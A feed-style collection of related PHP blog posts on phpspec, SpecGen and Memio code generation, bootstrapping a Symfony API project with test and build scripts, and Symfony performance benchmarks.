- the shouldBe matcher is usually the only one you need

If the tested object (official name: System Under Test, SUT) creates a value object and passes it to a collaborator, you have two choices: match it loosely with Argument::type('MyValueObject'), or build the expected value object in the test and match it exactly.

phpspec is a nice unit testing framework, with many advantages. Give it a try!
In this article we'll see a series of optimizations with their impact. Then we'll conclude that caching is actually better; let's see those figures!
The application is built with the Symfony Standard Edition and Doctrine ORM's QueryBuilder.
Composer's configuration has been tweaked to use PSR-4 and to not autoload tests.
Also Composer has been run with the --optimize-autoloader option.
Tests are done using ab (with 10 concurrent clients for 10 seconds), on a different server than the application's one.
Also, we're using PHP 5.5 and Symfony 2.7.
The application would initially serve 22 requests / second.
By removing unused dependencies, we get 23 requests / second.
Note
Removed:
- AsseticBundle
- SensioDistributionBundle (only from AppKernel, the dependency is kept to generate app/bootstrap.php.cache)
- SensioGeneratorBundle
- SwiftmailerBundle
- TwigBundle
- WebProfilerBundle
Also, the following components have been disabled:
- Form
- Validation
By switching from Doctrine ORM's Query Builder to Doctrine DBAL's: 28 requests / second.
By adding classes to compile: 29 requests / second.
By defining controllers as services: 30 requests / second.
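For reference, the ORM-to-DBAL switch listed above can be sketched as follows. Table and column names are illustrative, not from the benchmarked application.

<?php
// Doctrine DBAL's QueryBuilder queries tables directly and returns plain
// arrays, skipping the ORM's entity hydration layer entirely.
// $connection is an instance of Doctrine\DBAL\Connection.
$items = $connection->createQueryBuilder()
    ->select('id', 'name', 'category_id')
    ->from('item')
    ->setMaxResults(10)
    ->execute()
    ->fetchAll();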
This sums up to an increase of 36%.
By setting a 10-second HTTP cache (using FOSHttpCacheBundle) on top of the previous optimizations, we get 160 requests / second (an increase of 430%).
And that's by using Symfony's built-in reverse proxy; imagine what we could get with Varnish!
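Under the hood, the HTTP cache boils down to sending the right headers. As a sketch (not the actual bundle configuration used in the benchmark), a plain Symfony controller could mark its Response as publicly cacheable for 10 seconds like this:

<?php
// Mark the Response as cacheable by shared caches (Symfony's AppCache,
// Varnish, ...) for 10 seconds.
use Symfony\Component\HttpFoundation\Response;

$response = new Response('{"data":[]}', 200, array('Content-Type' => 'application/json'));
$response->setPublic();
$response->setSharedMaxAge(10); // Cache-Control: public, s-maxage=10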
While optimizations are fun, they don't bring much value. The main bottlenecks are usually the autoloading, database/network transactions and the number of functions called.
On the other hand, using a reverse proxy is quite simple and does pay off!
Our goal in this post is to bootstrap an application and then create a search endpoint for items. We've decided to use Symfony for a single reason: our company Acme has used it since the beginning, and the API developers team has Symfony and PHP skills.
Note: Most frameworks have good community support, strong documentation, similar features and many developers available on the market. We'll see the importance of a framework's performance in the following articles, but the point here is that the choice should mainly rely on the skills we have internally (and the ones we can acquire).
The first step is to use Composer:
composer create-project symfony/framework-standard-edition items
This will create a directory structure for our project, download a set of third
party libraries and ask us to set a bunch of configuration parameters. In this
series we'll use a Postgres database, so we need to edit app/config/config.yml:
# ...
# Doctrine Configuration
doctrine:
dbal:
driver: pdo_pgsql
# ...
Once finished we'll save our work using Git:
cd items
git init
git add -A
git commit -m 'Created a standard Symfony application'
Note: We can also use the Symfony Installer to create new projects.
For the same reason we chose Symfony we've decided to use Apache for our web servers (it's the one used for all previous projects).
Note: By providing Nginx training and recruiting devops used to it, Acme could change its technology stack. The only rule when switching to another technology is to stick to it, in order to avoid having too many different technologies.
We need to create a virtual host first by creating the /etc/apache2/sites-available/items.conf
file:
<VirtualHost *:80>
ServerName items.local
DocumentRoot /home/foobar/items/web
ErrorLog "/home/foobar/items/app/logs/apache_errors.log"
CustomLog "/home/foobar/items/app/logs/apache_accesses.log" common
<Directory /home/foobar/items/web>
Options Indexes FollowSymLinks MultiViews
AllowOverride all
Require all granted
Order allow,deny
allow from all
</Directory>
</VirtualHost>
Both Apache and our user need access to the logs and cache directories.
The easiest way to avoid permission issues is to change Apache's user and group
to ours in /etc/apache2/envvars:
export APACHE_RUN_USER=foobar
export APACHE_RUN_GROUP=foobar
We'll also need to add the hostname to our /etc/hosts file:
echo '127.0.0.1 items.local' | sudo tee -a /etc/hosts
Finally we have to enable the website and reload Apache to take the configuration into account:
sudo a2ensite items
sudo service apache2 reload
We now should be able to see the message "Homepage" when browsing http://items.local/app_dev.php/app/example
A nice tweak is to move tests into a separate directory, allowing Composer to only
autoload test classes in development environments. This can be done by changing composer.json
as follows:
{
"name": "acme/items",
"license": "private",
"type": "project",
"description": "Specific APIs for items",
"autoload": {
"psr-4": { "AppBundle\\": "src/AppBundle" }
},
"autoload-dev": {
"psr-4": { "AppBundle\\Tests\\": "tests/" }
},
"require": {
"php": ">=5.3.3",
"symfony/symfony": "~2.7@beta",
"doctrine/orm": "~2.2,>=2.2.3,<2.5",
"doctrine/dbal": "<2.5",
"doctrine/doctrine-bundle": "~1.4",
"symfony/assetic-bundle": "~2.3",
"symfony/swiftmailer-bundle": "~2.3",
"symfony/monolog-bundle": "~2.4",
"sensio/distribution-bundle": "~3.0,>=3.0.12",
"sensio/framework-extra-bundle": "~3.0,>=3.0.2",
"incenteev/composer-parameter-handler": "~2.0"
},
"require-dev": {
"sensio/generator-bundle": "~2.3"
},
"scripts": {
"post-install-cmd": [
"Incenteev\\ParameterHandler\\ScriptHandler::buildParameters",
"Sensio\\Bundle\\DistributionBundle\\Composer\\ScriptHandler::buildBootstrap",
"Sensio\\Bundle\\DistributionBundle\\Composer\\ScriptHandler::clearCache",
"Sensio\\Bundle\\DistributionBundle\\Composer\\ScriptHandler::installAssets",
"Sensio\\Bundle\\DistributionBundle\\Composer\\ScriptHandler::installRequirementsFile",
"Sensio\\Bundle\\DistributionBundle\\Composer\\ScriptHandler::removeSymfonyStandardFiles",
"Sensio\\Bundle\\DistributionBundle\\Composer\\ScriptHandler::prepareDeploymentTarget"
],
"post-update-cmd": [
"Incenteev\\ParameterHandler\\ScriptHandler::buildParameters",
"Sensio\\Bundle\\DistributionBundle\\Composer\\ScriptHandler::buildBootstrap",
"Sensio\\Bundle\\DistributionBundle\\Composer\\ScriptHandler::clearCache",
"Sensio\\Bundle\\DistributionBundle\\Composer\\ScriptHandler::installAssets",
"Sensio\\Bundle\\DistributionBundle\\Composer\\ScriptHandler::installRequirementsFile",
"Sensio\\Bundle\\DistributionBundle\\Composer\\ScriptHandler::removeSymfonyStandardFiles",
"Sensio\\Bundle\\DistributionBundle\\Composer\\ScriptHandler::prepareDeploymentTarget"
]
},
"extra": {
"symfony-app-dir": "app",
"symfony-web-dir": "web",
"symfony-assets-install": "relative",
"incenteev-parameters": {
"file": "app/config/parameters.yml"
}
}
}
Since we've decided to move vendor binaries back to vendor/bin, we can un-ignore
the bin directory by editing .gitignore:
/web/bundles/
/app/bootstrap.php.cache
/app/cache/*
/app/config/parameters.yml
/app/logs/*
!app/cache/.gitkeep
!app/logs/.gitkeep
/app/phpunit.xml
/build/
/vendor/
/composer.phar
To make it official, we need to run the following commands:
rm -rf bin
composer update
Note: In production, we'll need to run
composer install --no-dev --optimize-autoloader
Our system/functional tests will involve database queries, which can make the test suite
unreliable. To fix this, we'll create a "middleware" that wraps our AppKernel in a
database transaction and rolls it back after each request.
To do so, we can create the following app/RollbackKernel.php:
<?php
// File: app/RollbackKernel.php
use Doctrine\DBAL\Connection;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpKernel\HttpKernelInterface;
class RollbackKernel implements HttpKernelInterface
{
private $app;
private $connection;
public function __construct(HttpKernelInterface $app, Connection $connection)
{
$this->app = $app;
$this->connection = $connection;
}
public static function make()
{
$kernel = new \AppKernel('test', false);
$kernel->boot();
$connection = $kernel->getContainer()->get('doctrine.dbal.default_connection');
return new self($kernel, $connection);
}
public function handle(Request $request, $type = HttpKernelInterface::MASTER_REQUEST, $catch = true)
{
$this->connection->beginTransaction();
$response = $this->app->handle($request, $type, $catch);
$this->connection->rollback();
return $response;
}
}
To be able to use RollbackKernel in our tests we need to make it available by
creating the following app/bootstrap_test.php:
<?php
// File: app/bootstrap_test.php
require __DIR__.'/bootstrap.php.cache';
require __DIR__.'/AppKernel.php';
require __DIR__.'/RollbackKernel.php';
Then we can configure PHPUnit to use it by editing app/phpunit.xml.dist:
<?xml version="1.0" encoding="UTF-8"?>
<!-- http://phpunit.de/manual/current/en/appendixes.configuration.html -->
<phpunit backupGlobals="false" colors="true" syntaxCheck="false" bootstrap="bootstrap_test.php">
<testsuites>
<testsuite name="Functional Tests">
<directory>../tests</directory>
</testsuite>
</testsuites>
</phpunit>
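As a sketch, a functional test built on top of this setup could look like the following. The class name and endpoint are illustrative (the endpoint comes from the earlier Apache smoke test), not from the actual project.

<?php
// File: tests/ExampleEndpointTest.php (hypothetical)
namespace AppBundle\Tests;

use Symfony\Component\HttpFoundation\Request;

class ExampleEndpointTest extends \PHPUnit_Framework_TestCase
{
    private $app;

    protected function setUp()
    {
        // Each handled Request runs inside a transaction that is rolled back.
        $this->app = \RollbackKernel::make();
    }

    /**
     * @test
     */
    public function it_responds_successfully()
    {
        $request = Request::create('/app/example', 'GET');
        $response = $this->app->handle($request);

        self::assertSame(200, $response->getStatusCode());
    }
}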
Finally we'll install phpspec with SpecGen for our unit tests:
composer require --dev phpunit/phpunit:~4.6 phpspec/phpspec:~2.2 memio/spec-gen:~0.3
echo 'extensions:' > phpspec.yml
echo ' - Memio\SpecGen\MemioSpecGenExtension' >> phpspec.yml
And now we're ready to test our application! Let's save our work:
git add -A
git commit -m 'Prepared application for tests'
There are 3 common tasks we'll be doing as developers with our application: building it, testing it and deploying it.
In order to automate those in a simple way, we've decided to create 3 scripts:
bin/build.sh, bin/deploy.sh and bin/test.sh, but for this series we'll only
take care of build and test.
The build steps should reinitialize the database and Symfony's cache, for this we'll need Doctrine Fixtures and Doctrine Migrations:
composer require doctrine/doctrine-fixtures-bundle:~2.2
composer require doctrine/migrations:~1.0@alpha
composer require doctrine/doctrine-migrations-bundle:~1.0
Then we have to register them in app/AppKernel.php:
<?php
use Symfony\Component\HttpKernel\Kernel;
use Symfony\Component\Config\Loader\LoaderInterface;
class AppKernel extends Kernel
{
public function registerBundles()
{
$bundles = array(
new Symfony\Bundle\FrameworkBundle\FrameworkBundle(),
new Symfony\Bundle\SecurityBundle\SecurityBundle(),
new Symfony\Bundle\TwigBundle\TwigBundle(),
new Symfony\Bundle\MonologBundle\MonologBundle(),
new Symfony\Bundle\SwiftmailerBundle\SwiftmailerBundle(),
new Symfony\Bundle\AsseticBundle\AsseticBundle(),
new Doctrine\Bundle\DoctrineBundle\DoctrineBundle(),
new Sensio\Bundle\FrameworkExtraBundle\SensioFrameworkExtraBundle(),
new AppBundle\AppBundle(),
);
if (in_array($this->getEnvironment(), array('dev', 'test'))) {
$bundles[] = new Doctrine\Bundle\FixturesBundle\DoctrineFixturesBundle();
$bundles[] = new Doctrine\Bundle\MigrationsBundle\DoctrineMigrationsBundle();
$bundles[] = new Symfony\Bundle\DebugBundle\DebugBundle();
$bundles[] = new Symfony\Bundle\WebProfilerBundle\WebProfilerBundle();
$bundles[] = new Sensio\Bundle\DistributionBundle\SensioDistributionBundle();
$bundles[] = new Sensio\Bundle\GeneratorBundle\SensioGeneratorBundle();
}
return $bundles;
}
public function registerContainerConfiguration(LoaderInterface $loader)
{
$loader->load($this->getRootDir().'/config/config_'.$this->getEnvironment().'.yml');
}
}
Now we can write the following bin/build.sh script:
#!/usr/bin/env sh
echo ''
echo '// Building development environment'
rm -rf app/cache/* app/logs/*
composer --quiet --no-interaction install --optimize-autoloader > /dev/null
php app/console --quiet doctrine:database:drop --force > /dev/null 2>&1
php app/console --quiet doctrine:database:create
php app/console --no-interaction --quiet doctrine:migrations:migrate
php app/console --no-interaction --quiet doctrine:fixtures:load --fixtures=src
echo ''
echo ' [OK] Development environment built'
echo ''
The test steps should be similar, in addition they will run the test suites and check for coding standards. We can install PHP CS Fixer for this:
composer require --dev fabpot/php-cs-fixer:~1.6
Here's the bin/test.sh script:
#!/usr/bin/env sh
echo ''
echo '// Building test environment'
rm -rf app/cache/test app/logs/*test.log
composer --quiet --no-interaction install --optimize-autoloader > /dev/null
php app/console --env=test --quiet cache:clear
php app/console --env=test --no-debug --quiet doctrine:database:drop --force > /dev/null 2>&1
php app/console --env=test --no-debug --quiet doctrine:database:create
php app/console --env=test --no-debug --no-interaction --quiet doctrine:migrations:migrate
php app/console --env=test --no-debug --no-interaction --quiet doctrine:fixtures:load --fixtures=src
echo ''
echo ' [OK] Test environment built'
echo ''
vendor/bin/phpunit -c app && vendor/bin/phpspec --no-interaction run --format=dot && vendor/bin/php-cs-fixer fix --dry-run --config=sf23 .
With this we can start the tickets assigned to us, we can commit the changes:
chmod +x bin/*.sh
git add -A
git commit -m 'Created build and test scripts'
Acme's technology stack is composed of Apache2, PostgreSQL, Symfony, PHPUnit and phpspec. In order to make sure that anyone in the team or any newcomer can maintain this new application in the future, we've chosen to stay consistent with the rest.
In the next article, we'll create the search items endpoint in a pragmatic way.
Optimizing applications has an impact on maintenance, and making code harder to change right from the beginning might not be the best option. However, when the need for performance actually arises, we need to tackle it.
This series of articles is about this specific moment, and how to tackle it in a pragmatic way.
Spoiler Alert: It will feature a section where we optimize our application step by step, with a monitoring of the impact on performance. We'll see that those don't make a big difference, which is why those concerns shouldn't be addressed from day 1.
First, let's have a look at the big picture. Please note that the approach we use here is only one amongst many (every need is different, it might not be the best in every situation).
For our examples, we'll pretend to be the Acme Company which powers half the planet in almost every aspect of our lives. Performance isn't just a concern, it has become a reality.
Note: Those examples are all made up, but they're based on real experience.
We've analysed our market and we'd like to have the following new feature:
As a customer, I'd like to buy an item
During a meeting, we've come up with the following example:
Given a "fruit" category
When I pick a "banana"
Then it should be ordered
In the first days of Acme, we only had a few developers, who were full stack. It worked quite well, but we've grown so much that we had to recruit more specialized profiles, with a frontend team and an API one: it allowed us to parallelize the work.
Frontend applications that live in the customer's browser have been chosen because:
In the early days of Acme there was a single big application, but with the number of customers growing and asking for features specific to their needs, it failed us hard, costing us money, customers and developers. Now each frontend application talks to a dedicated API.
The dedicated APIs mix and match data coming from another layer of specific APIs. Those basically provide Create Read Update Delete and Search (CRUDS) access to their own data storage.
Note: We've decided to have two layers of APIs in order to avoid mixing features specific to a customer in an endpoint used by everyone.
From the User Stories, we've identified two types of data: item-related ones
and order-related ones.
We've decided to create the following applications:
- acme/order-items-front, the frontend application
- acme/order-items-api, the dedicated API
- acme/items, an API specific to the item and item_category tables
- acme/orders, an API specific to the order table

In this series, we'll focus on the creation of the Search endpoint in acme/items.
The Search endpoint should allow:

- pagination, using page and per_page parameters
- sorting, using a sort parameter

In this series, we'll focus on paginating items.
Here's a valid Request sample:
GET /v1/items?page=2&per_page=1 HTTP/1.1
It should return a Response similar to:
HTTP/1.1 200 OK
Content-Type: application/json
{"data":[{"id":42,"name":"banana","category_id":23}],"page":{"current_page":2,"per_page":1,"total_elements":2,"total_pages":2}}
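The `page` object in that Response follows directly from the request parameters. A minimal sketch of the pagination math (variable names are illustrative, not from the endpoint's actual code):

```php
<?php
// Inputs from the Request and from a COUNT query (illustrative values,
// matching the sample above).
$page = 2;
$perPage = 1;
$totalElements = 2;

// LIMIT/OFFSET values for the SQL query.
$offset = ($page - 1) * $perPage;
$limit = $perPage;

// Metadata returned in the Response's `page` object.
$totalPages = (int) ceil($totalElements / $perPage);

echo json_encode(array(
    'current_page' => $page,
    'per_page' => $perPage,
    'total_elements' => $totalElements,
    'total_pages' => $totalPages,
));
// Prints: {"current_page":2,"per_page":1,"total_elements":2,"total_pages":2}
```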
Our Acme mega corporation needs a new feature, and we've decided to implement it by creating a frontend and its dedicated API, which mixes and matches data coming from two new specific APIs.
The choice of this architecture has been made because it solved issues encountered in Acme's past, when we had a single big application.
In the next article we'll bootstrap a Symfony application to create an endpoint to search for items.
In the meantime, if you're interested in creating APIs in a pragmatic way, you can read the following article. If you're wondering why Acme didn't use this approach from the beginning, you might want to read the following article.
TL;DR: SpecGen v0.3 inserts a property for each constructor argument.
SpecGen is a phpspec extension which enhances its code generator. With the latest release, v0.3, we get the following features:

- method arguments named after their type (e.g. Filesystem $filesystem instead of $argument)
- a property inserted for each constructor argument (instead of bare $argument1, $argument2)

Here's a simple example to demonstrate how helpful it can be.
First of all, we need to set up a project with Composer.
Let's write the following composer.json:
{
"name": "vendor/project",
"autoload": {
"psr-4": {
"Vendor\\Project\\": "src/Vendor/Project"
}
},
"require": {},
"require-dev": {}
}
Then we can install phpspec with SpecGen by running those commands:
composer require --dev phpspec/phpspec:~2.2
composer require --dev memio/spec-gen:~0.3
echo 'extensions:' > phpspec.yml
echo ' - Memio\SpecGen\MemioSpecGenExtension' >> phpspec.yml
In our example, we'll specify a TextEditor service, it should be able to
create new files by relying on Filesystem, another service.
This can be done as follow:
phpspec describe 'Vendor\Project\TextEditor'
Tip: make your vendor's binaries available by adding vendor/bin to your $PATH: export PATH="vendor/bin:$PATH".
This should generate a spec/Vendor/Project/TextEditorSpec.php file:
<?php
namespace spec\Vendor\Project;
use PhpSpec\ObjectBehavior;
use Prophecy\Argument;
class TextEditorSpec extends ObjectBehavior
{
function it_is_initializable()
{
$this->shouldHaveType('Vendor\Project\TextEditor');
}
}
It needs to be edited to fit our needs:
<?php
namespace spec\Vendor\Project;
use Vendor\Project\Service\Filesystem;
use Vendor\Project\File;
use PhpSpec\ObjectBehavior;
class TextEditorSpec extends ObjectBehavior
{
const FILENAME = '/tmp/file.txt';
const FORCE_FILE_CREATION = true;
function let(Filesystem $filesystem)
{
$this->beConstructedWith($filesystem);
}
function it_creates_new_files(File $file, Filesystem $filesystem)
{
$filesystem->exists(self::FILENAME)->willReturn(false);
$filesystem->create(self::FILENAME)->willReturn($file);
$this->open(self::FILENAME, self::FORCE_FILE_CREATION)->shouldBe($file);
}
}
The Test Driven Development cycle advises us to run the test suite now:
phpspec run
This will bootstrap the following code:
<?php
namespace Vendor\Project;
use Vendor\Project\Service\Filesystem;
class TextEditor
{
private $filesystem;
public function __construct(Filesystem $filesystem)
{
$this->filesystem = $filesystem;
}
public function open($argument1, $argument2)
{
}
}
It created a filesystem property to mirror the constructor argument. Neat!
In our example phpspec also generated the collaborators (File and Filesystem).
These don't benefit from SpecGen's help yet, so the next release (v0.4) will
probably be about using it for collaborators.
Other features that could be implemented would be PHPdoc generation, or avoiding the
Interface / Abstract suffix/prefix in interface and abstract object argument names.
Reference: see the phpspec reference article
TL;DR: SpecGen v0.2 inserts use statements.
SpecGen v0.2 has been released, it introduces a small change: use statement insertion.
Let's go back to the sources of the example used in the previous article and clean it a little bit:
rm -rf src
Given the following specification:
<?php
// File: spec/Vendor/Project/RequestHandlerSpec.php
namespace spec\Vendor\Project;
use PhpSpec\ObjectBehavior;
use Vendor\Project\Message\Request;
class RequestHandlerSpec extends ObjectBehavior
{
function it_takes_a_request_and_returns_a_response(Request $request)
{
$parameters = array();
$isEnabled = true;
$this->handle($request, $parameters, $isEnabled)->shouldHaveType('Vendor\Project\Message\Response');
}
}
When we run the test suite:
phpspec run
Then we should get the following file, with a use statement:
<?php
namespace Vendor\Project;
use Vendor\Project\Message\Request;
class RequestHandler
{
public function handle(Request $request, array $argument1, $argument2)
{
}
}
Given the following new step in our specification:
<?php
// File: spec/Vendor/Project/RequestHandlerSpec.php
namespace spec\Vendor\Project;
use PhpSpec\ObjectBehavior;
use Vendor\Project\Message\Request;
class RequestHandlerSpec extends ObjectBehavior
{
function it_takes_a_request_and_returns_a_response(Request $request)
{
$parameters = array();
$isEnabled = true;
$this->handle($request, $parameters, $isEnabled)->shouldHaveType('Vendor\Project\Message\Response');
}
function it_supports_request(Request $request)
{
$this->supports($request)->shouldBe(true);
}
}
When we run the test suite:
phpspec run
Then we should get the following file, without new use statements:
<?php
namespace Vendor\Project;
use Vendor\Project\Message\Request;
class RequestHandler
{
public function handle(Request $request, array $argument1, $argument2)
{
}
public function supports(Request $request)
{
}
}
Let's clear everything:
rm -rf src
Given the following specification:
<?php
// File: spec/Vendor/Project/RequestHandlerSpec.php
namespace spec\Vendor\Project;
use PhpSpec\ObjectBehavior;
use Vendor\Project\Request;
class RequestHandlerSpec extends ObjectBehavior
{
function it_takes_a_request_and_returns_a_response(Request $request)
{
$parameters = array();
$isEnabled = true;
$this->handle($request, $parameters, $isEnabled)->shouldHaveType('Vendor\Project\Response');
}
}
Note: Request and RequestHandler are both in the same namespace.
When we run the test suite:
phpspec run
Then we should get the following, without any use statements:
<?php
namespace Vendor\Project;
class RequestHandler
{
public function handle(Request $request, array $argument1, $argument2)
{
}
}
This small feature was the occasion to refactor SpecGen a bit! This resulted in the
introduction of CodeEditor, a facade for a home made CommandBus and for
Redaktilo's Editor.
With these, the code to generate a method and insert a use statement looks like this:
$file = $this->codeEditor->open($fileName);
$this->codeEditor->handle(new InsertUseStatements($file, $fullyQualifiedNames));
$this->codeEditor->handle(new InsertMethod($file, $method));
$this->codeEditor->save($file);
While some improvements can still be done (use statements in alphabetical order, typehint interfaces only), the version 0.3 will mainly be about the introduction of a new generator: insertion of properties when the method is a constructor.
Stay tuned!
Reference: see the phpspec reference article
TL;DR: SpecGen is a phpspec extension that improves its code generator. Currently available: type hinted method arguments.
With Memio v1.0 released, it is now possible to create powerful code generators without re-inventing the wheel. SpecGen is the first project to use this library, let's see what it can do for us.
First of all we'll talk about phpspec, which is an exciting project that provides many benefits:
Note: See My top 10 favourite phpspec limitations.
It makes Test Driven Development cycles even more meaningful:
phpspec's code generator is a big part of its value. Let's see if we can improve it.
Let's have a look at how phpspec works. For this we'll need to have a project configured with Composer:
{
"name": "vendor/project",
"autoload": {
"psr-4": {
"Vendor\\Project\\": "src/Vendor/Project"
}
},
"require": {},
"require-dev": {}
}
We can install phpspec with the following:
composer require --dev phpspec/phpspec:~2.2
Let's say we want to create a class that handles requests, conforming to the HTTP protocol
(take a Request, return a Response). We can call this class RequestHandler:
phpspec describe 'Vendor\Project\RequestHandler'
Tip: make your vendor's binaries available by adding vendor/bin to your $PATH: export PATH="vendor/bin:$PATH".
We should now have the spec/Vendor/Project/RequestHandlerSpec.php file, bootstrapped
for us by phpspec:
<?php
namespace spec\Vendor\Project;
use PhpSpec\ObjectBehavior;
use Prophecy\Argument;
class RequestHandlerSpec extends ObjectBehavior
{
function it_is_initializable()
{
$this->shouldHaveType('Vendor\Project\RequestHandler');
}
}
We can directly start by writing our first specification (test method) in it:
<?php
// File: spec/Vendor/Project/RequestHandlerSpec.php
namespace spec\Vendor\Project;
use PhpSpec\ObjectBehavior;
use Vendor\Project\Request;
class RequestHandlerSpec extends ObjectBehavior
{
function it_takes_a_request_and_returns_a_response(Request $request)
{
$this->handle($request)->shouldHaveType('Vendor\Project\Response');
}
}
Note: We tried to make the test method as descriptive as possible (e.g. not
testHandler()). This is the whole point of specBDD (specification Behavior Driven Development).
With this we can start to bootstrap the code by simply running the test suite:
phpspec run
It will ask the following 3 questions, one for each missing element it can create for you:

- Vendor\Project\Request
- Vendor\Project\RequestHandler
- Vendor\Project\RequestHandler::handle()

By accepting every time, phpspec will bootstrap the following
src/Vendor/Project/RequestHandler.php file:
<?php
namespace Vendor\Project;
class RequestHandler
{
public function handle($argument1)
{
// TODO: write logic here
}
}
In our specification, we make use of a non-existing Request class, and phpspec
also bootstrapped it for us in src/Vendor/Project/Request.php:
<?php
namespace Vendor\Project;
interface Request
{
}
This is extremely useful to kickstart our TDD cycle!
SpecGen is a phpspec extension; it makes use of Memio (the PHP code generator library) to make the above bootstrapping even more awesome.
Here's how to install it:
composer require --dev memio/spec-gen:~0.1
We also need to register it as a phpspec extension by writing the following phpspec.yml file:
extensions:
- Memio\SpecGen\MemioSpecGenExtension
Its first release, v0.1 (unstable for now), improves the method generation with type hinted arguments, better argument names and PSR-2 compliance.
To be fair, this is exactly what Ciaran McNulty's Typehinted Methods extension already provides, so why would we choose SpecGen? Well, simply because it intends to do much more: insert use statements, generate constructor properties, generate PHPdoc...
Let's give it a try by first removing the code we bootstrapped until now:
rm -rf src
In order to demonstrate more type hints, we'll add more arguments:
<?php
// File: spec/Vendor/Project/RequestHandlerSpec.php
namespace spec\Vendor\Project;
use PhpSpec\ObjectBehavior;
use Vendor\Project\Request;
class RequestHandlerSpec extends ObjectBehavior
{
function it_takes_a_request_and_returns_a_response(Request $request)
{
$parameters = array();
$isEnabled = true;
$this->handle($request, $parameters, $isEnabled)->shouldHaveType('Vendor\Project\Response');
}
}
We can now run the test suite to bootstrap the code:
phpspec run
This should create the following src/Vendor/Project/RequestHandler.php file:
<?php
namespace Vendor\Project;
class RequestHandler
{
public function handle(Request $request, array $argument1, $argument2)
{
}
}
Note: for now use statements aren't generated. In our example it doesn't matter since Request is in the same namespace as RequestHandler.
Let's remove again the generated code:
rm -rf src
Now we'd like to see this multiline feature by adding many arguments to our specification:
<?php
// File: spec/Vendor/Project/RequestHandlerSpec.php
namespace spec\Vendor\Project;
use PhpSpec\ObjectBehavior;
class RequestHandlerSpec extends ObjectBehavior
{
function it_takes_a_request_and_returns_a_response()
{
$this->myMethod(1, 2, 3, 4, 5, 6, 7, 8);
}
}
Again, we run the test suite:
phpspec run
This should bootstrap the following src/Vendor/Project/RequestHandler.php file:
<?php
namespace Vendor\Project;
class RequestHandler
{
public function myMethod(
$argument1,
$argument2,
$argument3,
$argument4,
$argument5,
$argument6,
$argument7,
$argument8
)
{
}
}
And that's it!
Memio SpecGen improves phpspec's generator by adding better named, type hinted and PSR-2 compliant method arguments.
Note that this kind of improvement has to be done in an extension: it cannot be done directly in phpspec, because phpspec tries to enforce best practices, and one of them is to type hint only against interfaces. As it happens, these extensions can also type hint against implementations, depending on how developers write their specifications.
The next versions will bring even more exciting features, such as constructor and PHPdoc generation.
]]>Reference: see the phpspec reference article
TL;DR: Memio is a PHP code generator library. The main repository provides integration with Twig templates, but by using the smaller pretty-printer package on its own it is possible to stay decoupled from any template engine.
Memio has finally been released in version 1.0 (stable). In this article, we'll see how the different packages are assembled in the main repository.
Memio is composed of small packages (linter, model, pretty-printer, twig-template-engine, validator),
the main repository (memio/memio) is a standard selection of those
to make their usage easier:
It can be installed using Composer:
composer require memio/memio:~1.0
It provides two services, which can be instantiated as follows:
<?php
// File: memio.php
require __DIR__.'/vendor/autoload.php';
use Memio\Memio\Config\Build;
$linter = Build::linter();
$prettyPrinter = Build::prettyPrinter();
To see how to use them, let's describe a request handler method:
// ...
use Memio\Model\Method;
use Memio\Model\Argument;
$handle = Method::make('handle')
->addArgument(Argument::make('Request', 'request'))
->addArgument(Argument::make('int', 'type')
->setDefaultValue('self::MASTER_REQUEST')
)
->addArgument(Argument::make('bool', 'catch')
->setDefaultValue('true')
)
;
Note: Each Model can be constructed using new or the static constructor make. The latter has the advantage of allowing method chaining (e.g. Method::make('doHandle')->makePrivate()).
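The idea behind such a static constructor can be sketched in plain PHP, independently of Memio (the class below is illustrative, not part of the library):

```php
<?php

// Illustrative sketch of the static-constructor pattern used by Memio Models:
// make() returns a new instance, so setter calls can be chained right away.
class Example
{
    private $name;
    private $isPrivate = false;

    public function __construct($name)
    {
        $this->name = $name;
    }

    public static function make($name)
    {
        return new self($name);
    }

    public function makePrivate()
    {
        $this->isPrivate = true;

        return $this; // returning $this is what enables the chaining
    }

    public function isPrivate()
    {
        return $this->isPrivate;
    }
}

var_dump(Example::make('doHandle')->makePrivate()->isPrivate()); // bool(true)
```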
We can lint this model:
// ...
$linter->validate($handle); // @throws Memio\Validator\Exception\InvalidModelException if the model contains syntax errors.
And we can generate the corresponding PHP code:
// ...
$generatedCode = $prettyPrinter->generateCode($handle);
We can check the result in our console's output:
// ...
echo $generatedCode;
This should print:
public function handle(Request $request, $type = self::MASTER_REQUEST, $catch = true)
{
}
Currently it is possible to describe:
It is possible to describe a method Body, but only with a string:
// ...
$handle->setBody(<<<'BODY'
try {
$this->requestHandler->handle($request);
} catch (\Exception $e) {
if (!$catch) {
throw $e;
}
}
BODY
);
In real life, models wouldn't be built manually as in the above examples. They would be built dynamically:
// ...
array_shift($argv); // remove binary name (php)
array_shift($argv); // remove script name (memio.php)
$methodName = array_shift($argv); // first argument = method name
$arguments = $argv; // all other arguments = argument types (e.g. `int`, `bool`, `DateTime`, etc)
$method = new Method($methodName);
$index = 1;
foreach ($arguments as $argumentType) {
$argumentName = 'argument'.$index++;
$method->addArgument(new Argument($argumentType, $argumentName));
}
echo $prettyPrinter->generateCode($method);
Give it a try by running php memio.php handle Request int bool, it should print the following:
public function handle(Request $argument1, $argument2, $argument3)
{
}
With this we can already improve phpspec generator (generate typehinted arguments, PHPdoc, etc). This is going to be the next Memio package, a phpspec extension.
The coding style can be changed by creating our custom templates. Those can be loaded as follow:
// ...
$prettyPrinter->addTemplatePath(__DIR__.'/our-custom-templates-dir');
Custom constraints can be written to check more things, for example we can ensure that arguments are always objects.
Those steps, just like the rest, are heavily described in the official documentation.
Memio is a library that provides a PHP Code Generator:
- Models (e.g. new Method('__construct'))
- Lint them to check if we introduced syntax errors (e.g. a Method cannot be both abstract and final)
- PrettyPrinter to get the generated code (returns a string, which can be displayed on the output or saved in a file, etc.)
You can read more about it with the following articles:
It also has an official documentation.
The next step is to create a phpspec extension to improve its code generator.
]]>TL;DR: PrettyPrinter converts a Model into its PHP code (returns a string), using Twig templates.
Until now we've seen how to build Memio Models to describe PHP code and how to validate the syntax.
It's now time to take things seriously with the newly released package: PrettyPrinter, the actual code generator.
As opposed to "fidelity printers", which are supposed to reproduce the developer's coding style, "pretty printers" rely on their own style.
If we were to open an existing PHP file with Memio and then generate it again immediately, chances are that the code would look slightly different.
Note: Memio actually complies to PHP standards, with some extra rules.
The name "printer" is a bit misleading: one could think the service would print the generated code to the console's output or a web page, but all it really does is return a string.
Note: The terminology used is inspired by this StackOverflow answer.
Memio makes use of templates, making it easy to change the style. It defines a
TemplateEngine interface that has to be implemented, in order to comply with
webmozart's request.
